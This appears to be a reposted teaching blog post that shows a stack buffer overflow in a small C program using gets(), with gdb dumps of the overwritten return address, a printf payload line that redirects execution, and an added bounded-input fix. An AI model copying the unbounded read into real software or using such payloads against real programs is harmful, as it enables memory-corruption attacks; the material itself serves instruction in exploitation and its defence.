Demonstrating a Buffer Overflow with GDB

     1 #include <stdio.h>
     2 void return_input(void)
     3 {
     4     char array[5];          /* 5-byte stack buffer, sitting directly below the saved ebp */
     5     
     6     gets(array);            /* no length limit: anything beyond 5 bytes overflows */
     7     printf("%s\n", array);
     8 }
     9 int main(void)
    10 {
    11     return_input();
    12     return 0;
    13 }

    >gdb -q overflow

    (gdb) disas return_input
    Dump of assembler code for function return_input:
    0x0040138c <+0>: push %ebp
    0x0040138d <+1>: mov %esp,%ebp
    0x0040138f <+3>: sub $0xc,%esp
    0x00401392 <+6>: lea -0x5(%ebp),%eax
    0x00401395 <+9>: mov %eax,(%esp)
    0x00401398 <+12>: call 0x401b1c <gets>
    0x0040139d <+17>: lea -0x5(%ebp),%eax
    0x004013a0 <+20>: mov %eax,(%esp)
    0x004013a3 <+23>: call 0x401b14 <puts>
    0x004013a8 <+28>: leave
    0x004013a9 <+29>: ret
    End of assembler dump.

    (gdb) b *0x00401398  //0x00401398 <+12>: call 0x401b1c <gets>
    Breakpoint 2 at 0x401398: file overflow.c, line 6.
    (gdb) b *0x004013a3  //0x004013a3 <+23>: call 0x401b14 <puts>
    Breakpoint 3 at 0x4013a3: file overflow.c, line 7.
    (gdb) r

    (gdb) disas main
    Dump of assembler code for function main:
    0x004013aa <+0>: push %ebp
    0x004013ab <+1>: mov %esp,%ebp
    0x004013ad <+3>: call 0x4018dc <__main>
    0x004013b2 <+8>: call 0x40138c <return_input>
    0x004013b7 <+13>: mov $0x0,%eax
    0x004013bc <+18>: pop %ebp
    0x004013bd <+19>: ret
    End of assembler dump.

    (gdb) x/20x $esp //0x004013b7 is the return address, $esp=0x28ff14, $ebp=0x0028ff28
    0x28ff14: 0x0028ff1b 0x00000026 0x7efde000 0x0028ff28
    0x28ff24: 0x004013b7 0x0028ff68 0x004010b9 0x00000001
    0x28ff34: 0x005f2ba8 0x005f1978 0xffffffff 0x0028ff58
    0x28ff44: 0x76c98cd5 0xf2b91182 0xfffffffe 0x76c8161e
    0x28ff54: 0x76c815a0 0x00000000 0x005f1978 0x76c82811

    (gdb) cont
    Continuing.

    ABCDEDDDDDDDD

    (gdb) x/20x 0x28ff14
    0x28ff14: 0x0028ff1b 0x41000026 0x45444342 0x44444444
    0x28ff24: 0x44444444 0x0028ff00 0x004010b9 0x00000001
    0x28ff34: 0x005f2ba8 0x005f1978 0xffffffff 0x0028ff58
    0x28ff44: 0x76c98cd5 0xf2b91182 0xfffffffe 0x76c8161e
    0x28ff54: 0x76c815a0 0x00000000 0x005f1978 0x76c82811

    (gdb) step

    Program received signal SIGSEGV, Segmentation fault.
    0x44444444 in ?? ()  //return address successfully overwritten

    ===== Tampering with the return address =====

    >printf "ABCDEDDDD\xb2\x13\x40\x00" | overflow  //jmp to 0x004013b2 <+8>: call 0x40138c <return_input>
    ABCDEDDDD?@
    ABCDEDDDD?@
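As an added example (not code from the original post), the frame layout read off the gdb dump above is rebuilt as a C struct, with the unbounded copy that gets() performs placed beside a bounded fgets-based replacement; the struct, its field names and the 32-bit little-endian layout are assumptions reconstructed from the dump, and the input line is the one typed at the prompt above:

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
/* Model of return_input's frame, reconstructed from the gdb dump (assumed 32-bit
 * layout): array[5] at ebp-5, then saved ebp, return address, first caller word. */
struct frame {
    char     array[5];
    uint32_t saved_ebp;
    uint32_t ret;
    uint32_t caller_word;
} __attribute__((packed));
/* What gets() does: copies the whole line plus its NUL with no length check.
 * Bounded to the model struct only so that this program itself stays well defined. */
static void unbounded_copy(struct frame *f, const char *line)
{
    size_t n = strlen(line) + 1;
    if (n <= sizeof *f)
        memcpy((char *)f, line, n);          /* array is at offset 0 */
}
/* Hardened replacement for gets(): stores at most size-1 bytes, strips the
 * newline, discards the rest of an over-long line and returns 1 if it did so. */
static int bounded_read(char *buf, size_t size, FILE *in)
{
    int c, dropped = 0;
    if (fgets(buf, (int)size, in) == NULL) { buf[0] = '\0'; return 0; }
    size_t n = strlen(buf);
    if (n > 0 && buf[n - 1] == '\n') { buf[n - 1] = '\0'; return 0; }
    while ((c = fgetc(in)) != EOF && c != '\n')
        dropped = 1;                         /* swallow the bytes that would have overflowed */
    return dropped;
}
/* Feeds the page's input through one of the two readers and reports the
 * return-address word of the model frame afterwards. */
static uint32_t ret_after(int use_bounded)
{
    struct frame f = { "", 0x0028ff28u, 0x004013b7u, 0x0028ff68u }; /* values from the dump */
    if (!use_bounded) {
        unbounded_copy(&f, "ABCDEDDDDDDDD"); /* 13 bytes, newline already dropped by gets() */
        return f.ret;                        /* 0x44444444: saved ebp and ret both overwritten */
    }
    const char *typed = "ABCDEDDDDDDDD\n";   /* constructed: the same line typed at the prompt */
    FILE *in = fmemopen((void *)typed, strlen(typed), "r");
    bounded_read(f.array, sizeof f.array, in);
    fclose(in);
    return f.ret;                            /* unchanged: only "ABCD" was stored */
}
```

With the 5-byte array, 9 bytes reach the return address and 13 overwrite it completely, which is exactly why the 13-character line above crashed at 0x44444444.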

Original post: https://www.cnblogs.com/bittorrent/p/2707319.html